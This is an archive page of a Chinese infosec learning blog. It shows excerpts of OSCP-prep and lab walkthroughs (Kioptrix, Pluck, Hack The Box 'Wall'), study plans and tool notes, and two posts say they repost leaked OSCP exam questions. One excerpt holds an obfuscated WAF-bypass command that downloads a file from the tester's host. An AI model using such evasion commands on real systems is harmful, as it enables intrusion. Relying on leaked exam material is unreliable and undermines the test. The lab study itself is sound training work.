InfoSec learning 
  • Home
  • Archives
  • Categories
  • Tags
  •   
root@whale3070:~# _

OSCP-like linux VMs

参考资料: https://github.com/ferreirasc/oscp Kioptrix: Level 1 (#1)writeup 渗透思路:samba版本漏洞,远程缓冲区溢出,使用msf to root Kioptrix: Level 1.1 (#2)writeup 上 writeup 下 渗透思路:linux + web 远程命令执行漏洞,获得shell。linux内核漏洞提权

2019-12-11
oscp
oscp

2020年学习计划

一转眼一年就过去了,去年春节的事情还历历在目,就好像昨天发生的事情一样。今年一直很焦虑,担心一些很小的事情。大三上学期4月的时候担心毛概老师要是不给我过怎么办,6月末担心英语6级没有考过怎么办?暑假实习做ctf培训备课,很紧张担心万一出问题了怎么办?9月大四上学期,秋招找不到工作怎么办? 结果担心的事情一件也没有发生。 今年就在上课、实习、写作业、写渗透报告,等等杂七杂八的事情中过去了。学到最多的

2019-12-11
experience
experience

Kioptrix 2014

Kioptrix 20142:07 开始http://192.168.67.129/ 12322/tcp closed ssh80/tcp filtered http8080/tcp open http-proxy web2:28 web目录扫描,爬行 查看源码,发现一个地址pChart2.1.3/index.php 123searchsploit pchartsearchsp

2019-12-09
training
training

Pluck(本地文件包含+内核漏洞提权)

靶机下载地址 1234567891011192.168.1.11522/tcp open ssh OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))3306/tcp open mysql MySQL (unauthoriz

2019-12-08
training
training

oscp真题解析

由于微信公众号文章的不稳定性,我收藏的某些文章竟然提示已经被作者删除。由于国内的网络安全法,所以遇到微信公众号上的好文章最好保存到本地,以免过段时间去看就已经被删掉了。 本地的学习资料是oscp泄露的真题(稳定性起见,已经放在我自己的博客上做个备份了,如有侵权请联系我进行删除),但在考试环境中已经移除,但是对于体验oscp考点还是比较有帮助。 OutOfBox参考资料: nfs 原理 NFS 服务

2019-12-06
oscp
oscp

OSCP真题泄露-目前已经移除

OSCP真题泄露-目前已经移除 .rich_media_inner{word-wrap:break-word;-webkit-hyphens:auto;-ms-hyphens:auto}.rich_media_area_primary{padding:calc(20px + env(safe-area-inset-top)) calc(16px + en

2019-12-03
oscp reference

学习清单:为oscp做准备

Offensive Security Certified Professional 参考资料: 官方考试要点 oscp faq 非常全的oscp备考资料 考试规则时间:23小时45分钟考试,结束后24小时内编写并提交渗透测试报告。 随机抽取5个主机,每个主机有低权限flag和代表以获取最高权限的flag,分数不一。拿到70分代表考试合格。 考试要准备的 护照 人民币5600——8050不等,根

2019-11-21
oscp

ptf框架

上一篇: AWS亚马逊云服务器搭建与使用 https://github.com/trustedsec/ptf https://vimeo.com/137133837 https://www.freebuf.com/sectool/209091.html 题外话君子性非异也,善假于物也 曾经有一句话一直困扰着我–“做渗透测试不要太依赖工具”。而渗透测试又不可能不用工具,我们使用各种各样的软件来

2019-11-21
tools
tools

Wall-rce与绕过waf(下)

参考资料:绕过waf之命令执行 12题外话:恐惧和自满是练习的天敌。 ——————《刻意练习》 访问http://10.10.10.157/centreon/main.php?p=60901&o=c&server_id=1 手动测试命令执行 (失败的)测试绕过waf/bin/w??t${IFS}http://10.10.14.18/index.htm

2019-11-18
training
training

渗透实战第三版实验csk-web之XSS

参考资料:下载地址: http://thehackerplaybook.com/get.php?type=csk-web echo 目标机器的ip chat >> /etc/hosts 首先我们看下这个网站,注册一个账号并登陆。网页上有一些存在漏洞的提示。 反射型XSShttp://chat:3000/chatchannel/1 反射型XSS是最简单的xss,因为网页没有过滤用户

2019-11-16
web
web
1…7172737475…96

Search

Whale3070
总访问量 次 总访客数 人